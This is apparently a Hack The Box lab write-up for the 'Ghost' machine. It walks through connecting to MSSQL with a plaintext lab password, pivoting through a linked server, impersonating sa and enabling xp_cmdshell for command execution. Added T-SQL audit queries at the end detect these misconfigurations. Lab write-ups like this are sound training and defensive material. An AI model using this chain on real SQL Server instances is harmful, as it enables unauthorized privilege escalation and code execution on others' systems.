MSSQL
Using the credential of the florence.ramirez user, I can attempt to connect to the target MSSQL instance
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=florence.ramirez@dc01.ghost.htb.ccache impacket-mssqlclient 'GHOST.HTB/florence.ramirez@dc01.ghost.htb' -k -no-pass -dc-ip $IP -debug
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Encryption required, switching to TLS
[+] Using Kerberos Cache: florence.ramirez@dc01.ghost.htb.ccache
[+] SPN MSSQLSVC/DC01.GHOST.HTB:1433@GHOST.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/GHOST.HTB@GHOST.HTB
[+] Using TGT from cache
[+] Searching target's instances to look for port number 1433
[+] Trying to connect to KDC at 10.10.11.24:88
[+] Server time (UTC): 2024-07-16 13:40:12
[+] Exception:
Traceback (most recent call last):
File "/usr/share/doc/python3-impacket/examples/mssqlclient.py", line 97, in <module>
res = ms_sql.kerberosLogin(options.db, username, password, domain, options.hashes, options.aesKey,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/tds.py", line 770, in kerberosLogin
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/krb5/kerberosv5.py", line 451, in getKerberosTGS
r = sendReceive(message, domain, kdcHost)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/krb5/kerberosv5.py", line 91, in sendReceive
raise krbError
impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
Kerberos authentication with the florence.ramirez user's TGT fails against the target MSSQL instance: the KDC answers KDC_ERR_S_PRINCIPAL_UNKNOWN, i.e. it has no service principal matching the requested SPN.
It is possible that the target MSSQL instance is not configured to accept Kerberos authentication, or that something is wrong with DNS.
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ impacket-mssqlclient florence.ramirez@$IP -target-ip $IP -windows-auth -debug
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
Password: uxLmt*udNc6t3HrF
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (GHOST\florence.ramirez guest@master)>
However, direct Windows (NTLM) authentication works.
The florence.ramirez user has guest-level access to the master DB.
SQL (GHOST\florence.ramirez guest@msdb)> enable_xp_cmdshell
ERROR: Line 1: You do not have permission to run the RECONFIGURE statement.
Attempting to enable xp_cmdshell fails, as expected for a guest-level login: RECONFIGURE requires the ALTER SETTINGS server permission.
Linked Server
SQL (GHOST\florence.ramirez guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
-------- ---------------- ----------- -------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
PRIMARY SQLNCLI SQL Server PRIMARY NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
------------- ----------- --------------- ------------
SQL (GHOST\florence.ramirez guest@master)> EXEC sp_linkedservers
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
-------- ---------------- ----------- -------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
PRIMARY SQLNCLI SQL Server PRIMARY NULL NULL NULL
SQL (GHOST\florence.ramirez guest@master)> SELECT @@SERVERNAME AS CurrentServer;
CurrentServer
-------------
DC01
Checking the linked servers, there is another MSSQL instance, PRIMARY, on the PRIMARY host. I am currently connected to the DC01 MSSQL instance on the DC01 host.
SQL (GHOST\florence.ramirez guest@master)> use_link [PRIMARY]
SQL >[PRIMARY] (bridge_corp bridge_corp@master)>
After switching over to the PRIMARY MSSQL instance through the link, I am now the bridge_corp account, the remote login the link is mapped to.
Impersonation
SQL >[PRIMARY] (bridge_corp bridge_corp@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ----------- -------
b'LOGIN' b'' IMPERSONATE GRANT bridge_corp sa
The bridge_corp login holds IMPERSONATE on the sa login, so I am able to impersonate the sa account in the PRIMARY MSSQL instance.
SQL >[PRIMARY] (bridge_corp bridge_corp@master)> exec_as_login sa
SQL >[PRIMARY] (sa dbo@master)>
Logging in as the sa account.
xp_cmdshell
SQL >[PRIMARY] (sa dbo@master)> enable_xp_cmdshell
[*] INFO(PRIMARY): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(PRIMARY): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
I can now enable xp_cmdshell as the sa account.
SQL >[PRIMARY] (sa dbo@master)> xp_cmdshell whoami
output
----------------------
nt service\mssqlserver
NULL
Code execution confirmed. Moving on to the Lateral Movement phase.
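As an added set of audit queries (not part of the original writeup or of the impacket tooling), the following T-SQL surfaces, on each instance, the four conditions that made this chain possible: NTLM fallback where Kerberos failed, a linked server mapped to a fixed remote login, an IMPERSONATE grant on sa, and xp_cmdshell being enablable. It uses only standard SQL Server catalog views and assumes it is run by a login with VIEW ANY DEFINITION or sysadmin.

```sql
-- Added audit queries (not from the original writeup). Run on DC01 and on
-- PRIMARY with a privileged login; all objects are standard catalog views.

-- 1. How did this session authenticate? KERBEROS is expected when the MSSQLSvc
--    SPN is registered; NTLM here matches the KDC_ERR_S_PRINCIPAL_UNKNOWN above.
SELECT session_id, auth_scheme, net_transport, encrypt_option
FROM sys.dm_exec_connections
WHERE session_id = @@SPID;

-- 2. Linked servers and their login mappings. local_principal_id = 0 means the
--    mapping applies to every local login; a fixed remote_name (bridge_corp on
--    PRIMARY) lets any such login run remote queries under that identity.
SELECT s.name          AS linked_server,
       s.data_source,
       ll.local_principal_id,
       lp.name         AS local_login,     -- NULL when the mapping is for all logins
       ll.uses_self_credential,
       ll.remote_name  AS remote_login
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1;

-- 3. Server-level IMPERSONATE grants. For class SERVER_PRINCIPAL, major_id is
--    the login being impersonated; a grant on sa equals handing out sysadmin.
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate,
       grantor.name AS granted_by,
       p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
JOIN sys.server_principals AS grantor ON grantor.principal_id = p.grantor_principal_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE';

-- 4. Current xp_cmdshell state. value_in_use = 1 means OS command execution is
--    live; value = 1 with value_in_use = 0 means it was set but not RECONFIGUREd.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');
```

Query 2 run on DC01 is the one that exposes the bridge_corp mapping seen when switching to the PRIMARY link; query 3 run on PRIMARY shows the bridge_corp -> sa grant that enum_impersonate reported.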